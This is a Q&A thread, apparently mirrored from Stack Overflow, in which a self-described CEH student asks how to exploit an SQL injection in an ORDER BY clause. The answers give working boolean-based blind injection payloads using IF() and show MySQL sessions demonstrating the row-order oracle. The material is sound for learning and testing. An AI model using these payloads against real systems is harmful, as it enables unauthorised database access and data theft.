问题
I have found one my demo website is vulnerable to SQL INJECTION (me currently doing CEH)
Discovered injection point is as follows:
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [*INJECTION POINT FOUND HERE*]
Now i need to craft something which could help me exploit this injection point that i have discovered. As far as I know UNION SELECT wont work after ORDER BY. However, I do think that blind sql injection may work as illustrated below
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [if 1=1 then 1,blank]
Now if 1 is posted at the injection point the query gives error, whereas if its kept blank the query will execute...THUS blind sql injection will work
Can someone please help me craft a query with IF THEN ELSE in SQL as I don't know how to use IF THEN ELSE in sql..
Tried Injecting this but not working
(IF (1=2) then 1 endif)
Complete query
SELECT column_1, column_2, column_3 from `table_1` WHERE `column_4` = '[*available injection point*]' order by id [*available injection point*] ASC limit [*available injection point*],[*available injection point*]
回答1:
If id is not unique in the result set and there is another column whose values are unique per id, you can do the following:
- Identify the order of the unique per ID value with
, unique_per_id(must be different toidonly, usedesconidif necessary). - Boolean-based blind injection is possible with
, IF(1=1,unique_per_id,id).
Example:
mysql> select host,user from mysql.user order by user;
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,host;
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=1,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=0,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
So whenever the result set’s order with if(expr,host,user) is identical to the order with just host (second query), the condition expr was true.
回答2:
You can inject:
+ IF(1=1, 1, 0)
The resulting query will be:
SELECT column_1,column_2,column_3
from table_1
where column_4='3'
order by id + IF(1=1, 1, 0)
来源:https://stackoverflow.com/questions/17252442/crafting-a-query-for-blind-sql-injection